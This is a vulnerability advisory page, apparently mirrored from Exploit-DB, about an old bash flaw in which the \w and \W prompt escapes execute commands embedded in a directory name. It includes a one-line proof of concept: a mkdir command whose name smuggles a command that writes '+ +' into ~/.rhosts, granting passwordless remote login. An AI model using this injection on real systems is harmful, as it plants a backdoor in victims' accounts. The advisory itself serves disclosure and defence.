header-logo
Suggest Exploit
vendor:
Bash
by:
Unknown
N/A
CVSS
HIGH
Command Injection
78
CWE
Product Name: Bash
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Vulnerability in bash allowing inadvertently running commands in the path to the current working directory

A vulnerability in bash allows inadvertently running commands embedded in the path to the currently working directory. If an unsuspecting user enters a directory created by some malicious user with embedded commands, and their prompt (PS1) contains 'w' or 'W', and the prompt is displayed, the commands will be executed. The vulnerability is in the parsing of the 'w' and 'W' escape codes. As the prompt must be displayed unattended shell scripts are not vulnerable.

Mitigation:

Patch or update bash to the latest version. Avoid running untrusted scripts or accessing directories created by untrusted users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/119/info

A vulnerability in bash may allow inadvertently running commands embedded in the path to the currently working directory.

If an unsuspecting user enters a directory created by some malicious user with embedded commands, and their prompt (PS1) contains '\w' or '\W', and the prompt is displayed the commands will be executed. The vulnerability is in the parsing of the '\w' and '\W' escape codes.

As the prompt must be displayed unattended shell scripts are not vulnerable.

mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\` "

Navigation

Suggest Exploit

Services By CQR